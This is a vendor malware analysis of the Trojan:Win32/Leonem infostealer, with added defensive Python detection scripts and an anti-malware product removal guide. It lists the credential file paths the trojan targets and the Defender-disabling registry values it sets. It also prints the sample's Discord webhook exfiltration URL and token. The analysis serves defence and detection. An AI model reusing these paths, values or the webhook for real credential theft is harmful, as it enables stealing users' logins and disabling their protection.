Trojan:Win32/Leonem

What is Trojan:Win32/Leonem?
The Trojan:Win32/Leonem detection flags potential spyware activity that you should react to immediately.

Trojan:Win32/Leonem is spyware that targets login data stored on a compromised system, including data saved in browsers and email clients. It primarily spreads through malicious documents or disguised as legitimate software.

Trojan:Win32/Leonem Overview

Trojan:Win32/Leonem is the detection name used by Microsoft Defender to identify spyware. It’s a classic example of this malware type, which aims to steal sensitive information from a victim’s system. In addition to its main function, it can also operate as a malware dropper, i.e. deliver other malware. In terms of its core functionality, Leonem can carry out activities like keylogging and collecting sensitive data (logins, browser passwords, browser history, cookies, cache, etc.). It also seeks other login credentials stored on the compromised system, including those in email clients.

Trojan:Win32/Leonem detection popup

As for the payload, the Leonem Trojan is capable of downloading additional malicious components. Most often, it deploys ransomware and backdoors, though its capabilities are not limited to these threats. This malware typically spreads through malicious attachments in phishing emails or bundled with legitimate software downloaded from untrustworthy sources. Once launched on the system, Trojan:Win32/Leonem attempts to disable security software and modify system settings to ensure persistence by running each time the operating system boots.

Technical Analysis

Let’s now take a deeper look at the threat’s behavior on an infected system. Since it is a classic information stealer, it has a rather predictable behavior pattern. The malware’s initial actions focus on detecting sandbox environments, debuggers, or virtual machines. To do this, Leonem leverages the following legitimate processes:

%windir%\System32\svchost.exe -k WerSvcGroup
wmiadap.exe /F /T /R
%windir%\system32\wbem\wmiprvse.exe
"%windir%\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

Leonem retrieves BIOS information using WMI queries, specifically targeting Win32_Bios and Win32_NetworkAdapter. Additionally, it abuses the aspnet_compiler.exe process and queries hardware properties via WMI. Among other things, it inspects specific registry values and files, including:

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\Levels
C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config

In addition to detecting the virtual environment, the malware generates a system fingerprint to uniquely identify the infected system.

Next, the malware assesses the presence and status of installed anti-malware solutions. If Microsoft Defender is enabled on the system, the malware attempts to turn it off. This also allows the malware to establish persistence within the system. For all of this, Leonem abuses the following legitimate processes and checks the following registry values and system locations:

C:\Windows\system32\services.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\SecurityHealthService.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiVirus
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\MpEngine_DisableScriptScanning
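One way to check a host for the Defender kill switches listed above is to export the two keys with `reg export` and scan the dump for values set to 1. The script below is an added example, not part of the original article or any GridinSoft tooling; the .reg sample it parses is constructed, and the `WATCHED` list is simply the value names from the article:

```python
import re

# Registry values the article lists as targets when Leonem tries to switch off
# Microsoft Defender. A DWORD of 1 in any of them disables that protection.
DEFENDER = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender"
RTP = DEFENDER + r"\Real-Time Protection"
WATCHED = (
    (DEFENDER, "DisableAntiVirus"),
    (RTP, "DisableIOAVProtection"),
    (RTP, "DisableRealtimeMonitoring"),
    (RTP, "DisableScriptScanning"),
    (RTP, "MpEngine_DisableScriptScanning"),
)

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
DWORD_RE = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<hex>[0-9a-fA-F]{8})$')

def parse_reg_export(text: str) -> dict:
    """Parse the DWORD values of a 'reg export' (.reg) dump into {key: {name: int}}."""
    values, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if m := KEY_RE.match(line):
            current = m.group("key")
            values.setdefault(current, {})
        elif (m := DWORD_RE.match(line)) and current is not None:
            values[current][m.group("name")] = int(m.group("hex"), 16)
    return values

def find_defender_tampering(reg_text: str) -> list:
    """Return (key, value name) pairs whose Defender kill switch is set to 1."""
    parsed = parse_reg_export(reg_text)
    return [(k, n) for k, n in WATCHED if parsed.get(k, {}).get(n) == 1]

# Constructed sample of what 'reg export' of the two keys could look like on a
# host where real-time monitoring and script scanning have been turned off.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiVirus"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection]
"DisableRealtimeMonitoring"=dword:00000001
"DisableScriptScanning"=dword:00000001
"DisableIOAVProtection"=dword:00000000
"""

if __name__ == "__main__":
    for key, name in find_defender_tampering(SAMPLE_REG):
        print(f"Defender tampering: {key}\\{name} = 1")
```

A real `reg export` writes UTF-16 text, so decode the file before passing it in; a hit should be confirmed against Group Policy (the HKLM\SOFTWARE\Policies key above), since an administrator may have set the same values deliberately.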

Data Collection

After all the checks, Trojan:Win32/Leonem initiates its primary operation: data collection. It gathers passwords and session tokens from browsers, email clients, and other applications that keep authentication details locally. In addition, the malware creates a DirectInput object, enabling it to function as a keylogger, i.e. capture all text typed on the keyboard. It specifically targets the following file paths:

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\\AppData\Local\360Chrome\Chrome\User Data
C:\Users\\AppData\Local\Chromium\User Data
C:\Users\\AppData\Local\Mailbird\Store\Store.db
C:\Users\\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
C:\Users\\AppData\Local\Microsoft\Edge\User Data\Login Data
C:\Users\\AppData\Local\Tencent\QQBrowser\User Data\Default\EncryptedStorage
C:\Users\\AppData\Local\Torch\User Data
C:\Users\\AppData\Local\UCBrowser\
C:\Users\\AppData\Roaming\Mozilla\Firefox\Profiles\1hmu7354.default-release\logins.json
C:\Users\\AppData\Roaming\Mozilla\Firefox\Profiles\1hmu7354.default-release\signons.sqlite
C:\Users\\AppData\Roaming\Mozilla\Firefox\profiles.ini
C:\Users\\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini
C:\Users\\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
C:\Users\\AppData\Roaming\Thunderbird\profiles.ini

Leonem collects data both in plain text and in the form of a hash.
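The credential stores above give a defender a simple file-access rule: only the owning application should ever open them. The following is an added example, not code from the article; it normalizes file-access events (such as Sysmon or EDR file-read records) and flags any process other than the expected owner touching a listed store. The owner mapping and the sample events are the editor's constructed assumptions, using the aspnet_compiler.exe process the article names:

```python
import re
from collections import namedtuple

# A subset of the credential stores the article lists, keyed by the process that
# legitimately owns each file. <user> and the Firefox profile folder are wildcards.
OWNERS = {
    r"C:\Users\<user>\AppData\Local\Google\Chrome\User Data\Default\Login Data": {"chrome.exe"},
    r"C:\Users\<user>\AppData\Local\Microsoft\Edge\User Data\Default\Login Data": {"msedge.exe"},
    r"C:\Users\<user>\AppData\Roaming\Mozilla\Firefox\Profiles\*\logins.json": {"firefox.exe"},
    r"C:\Users\<user>\AppData\Roaming\Thunderbird\profiles.ini": {"thunderbird.exe"},
}

Event = namedtuple("Event", "process path")

def normalize(path: str) -> str:
    """Replace the user name and Firefox profile folder with wildcards, then lowercase."""
    p = re.sub(r"^(c:\\users\\)[^\\]+", r"\1<user>", path, flags=re.I)
    p = re.sub(r"(\\profiles\\)[^\\]+", r"\1*", p, flags=re.I)
    return p.lower()

RULES = {normalize(k): v for k, v in OWNERS.items()}

def suspicious_reads(events) -> list:
    """Return (process, path) for reads of a credential store by a non-owner process."""
    out = []
    for ev in events:
        owners = RULES.get(normalize(ev.path))
        if owners and ev.process.lower() not in owners:
            out.append((ev.process, ev.path))
    return out

# Constructed file-access events: one legitimate browser read, two reads by the
# abused aspnet_compiler.exe process, and one unrelated file.
SAMPLE_EVENTS = [
    Event("chrome.exe", r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event("aspnet_compiler.exe", r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event("aspnet_compiler.exe", r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\1hmu7354.default-release\logins.json"),
    Event("notepad.exe", r"C:\Users\alice\Documents\notes.txt"),
]

if __name__ == "__main__":
    for process, path in suspicious_reads(SAMPLE_EVENTS):
        print(f"credential store read by {process}: {path}")
```

Backup agents and password-manager importers will also trip this rule, so the owner sets need tuning per environment.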

Data Exfiltration

At the final stage of the attack, Trojan:Win32/Leonem sends the gathered data to its command server. The reviewed sample uses a Discord webhook for this purpose. Beforehand, the malware sets up TCP connections on ports 443 and 80. This confirms that it attempts to communicate with remote servers to transmit information or receive commands. Below are some of the requests sent to the webhook.

POST https://discord.com:443/api/webhooks/1202330946817237022/1d5Ynow6yHbMqcRfr75qQjJVcSQnFlKpV4g5H2hHiKoRW33XeyZHnl-7hxdTf95oiy9f 200
POST https://discord.com/api/webhooks/1202330946817237022/1d5Ynow6yHbMqcRfr75qQjJVcSQnFlKpV4g5H2hHiKoRW33XeyZHnl-7hxdTf95oiy9f 404

The 200 status at the end of the first request means it completed successfully; the 404 on the second indicates an error, most likely because the webhook has since been deleted or changed. In addition, the malware uses the ip-api.com service to retrieve details about the environment in which it runs. In this way, it tries to determine whether it is running on a hosting server or on a regular computer.
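Both request shapes above, the explicit `:443` form and the one answered with 404, are worth alerting on, since the attempt is the signal regardless of the response. The script below is an added detection example, not part of the article; it runs over constructed proxy log lines (timestamp, client, method, URL, status), reports Discord webhook POSTs by webhook ID only, so the secret token is never copied into an alert, and also flags the ip-api.com lookup the article describes. The webhook ID and token in the sample are placeholders:

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed proxy log lines. The two Discord requests mirror the shapes shown
# in the article: one with an explicit :443 port and one answered 404.
SAMPLE_LOG = """\
2024-02-01T10:00:01Z 10.0.0.5 GET http://ip-api.com/json/ 200
2024-02-01T10:00:02Z 10.0.0.5 POST https://discord.com:443/api/webhooks/123456789012345678/TOKEN_PLACEHOLDER 200
2024-02-01T10:00:03Z 10.0.0.5 POST https://discord.com/api/webhooks/123456789012345678/TOKEN_PLACEHOLDER 404
2024-02-01T10:00:04Z 10.0.0.9 GET https://www.example.com/index.html 200
2024-02-01T10:00:05Z 10.0.0.9 GET https://discord.com/api/v9/users/@me 200
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")
WEBHOOK_RE = re.compile(r"^/api/webhooks/(?P<id>\d+)/[^/]+$")

def classify(url: str, method: str):
    """Return an indicator label for one request, or None if it is uninteresting."""
    parts = urlsplit(url)
    host = parts.hostname or ""  # hostname drops an explicit :443 or :80 port
    if host == "discord.com" and method == "POST":
        m = WEBHOOK_RE.match(parts.path)
        if m:
            # Report only the webhook ID; the token is a secret we never log.
            return f"discord_webhook_post id={m.group('id')}"
    if host == "ip-api.com":
        return "ip-api_lookup"
    return None

def find_exfil_candidates(log_text: str) -> dict:
    """Group indicators by client. A 404 still counts: the attempt is what matters."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        label = classify(m.group("url"), m.group("method"))
        if label:
            hits[m.group("client")].append((label, int(m.group("status"))))
    return dict(hits)

if __name__ == "__main__":
    for client, events in find_exfil_candidates(SAMPLE_LOG).items():
        print(client, events)
```

A client that performs the ip-api.com lookup and then POSTs to a webhook within a short window, as 10.0.0.5 does here, is the pattern to escalate; a lone webhook POST from a workstation that legitimately uses Discord integrations needs more context.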

How To Remove Trojan:Win32/Leonem?

As we can see, Trojan:Win32/Leonem is a rather serious threat that deactivates Microsoft Defender whenever possible. Therefore, to effectively remove this Trojan, it’s recommended to use a reliable third-party anti-malware solution like GridinSoft Anti-Malware. To eliminate Trojan:Win32/Leonem from your system, follow these steps:

GridinSoft Anti-Malware main screen

Download and install GridinSoft Anti-Malware. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the action the anti-malware program takes for each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection: malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are many detections. Do not interrupt it, and your system will be as clean as new.

Removal finished

By Stephanie Adlam

I write about how to make your Internet browsing comfortable and safe. The modern digital world is worth being a part of, and I want to show you how to do it properly.
